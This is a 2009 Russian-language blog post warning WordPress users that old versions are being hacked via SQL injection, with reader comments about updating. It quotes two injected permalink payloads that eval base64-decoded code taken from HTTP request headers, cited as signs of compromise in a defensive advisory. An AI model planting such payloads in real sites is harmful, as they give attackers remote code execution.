WordPress. Взлом старых версий
08.09.2009 | Прочитано:2831
Очередная маст рид заметка о безопасности WordPress. Среди читателей и просто блоггеров есть многие, кто еще пользуется старой версией движка. А я вам говорю всегда – обновляться нужно! Как просто обновить WordPress я уже рассказывал, проблем (практически) не бывает в 99% случаев.
Новая уязвимость в старых! версиях позволяет изувечить весь ваш блог. Методом MySQL-инъекции, можно поломать ЧПУ, сделав их совсем не рабочими, а еще злоумышленник получает доступ к администрированию блога!.
Атакованные блоги подвергаются хаку, который добавляет к пермалинку:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Те, кто понял, что угроза не шуточная, прочитайте вот эти два материала. Первый о том, что происходит, а второй – как защититься от проблемы. Не забывайте обновляться до последней версии!
- По теме подробнее у Дмитрия Донченко – http://blogproblog.com
- И лечение этого хака на Inforedesign.com (первоисточник)
Коля, как-то ты проигнорировал рецепт Ю.Б.: http://forum.maxsite.org/viewtopic.php?id=8962
А это реальный способ защитить свой блог без абгрейда до последней версии.
MAX » каюсь. реально простой способ =) Но обновлять все-равно надо!
Раз в две недели? Шутишь?
Не зря я обновляюсь значит. Хотя меня уже пытались ломануть, благо последняя версия была и не чего кроме как сбросить пароль не сделали.
MAX » не, не так часто, а с помощью автоапдейта – 5 кликов и готово =)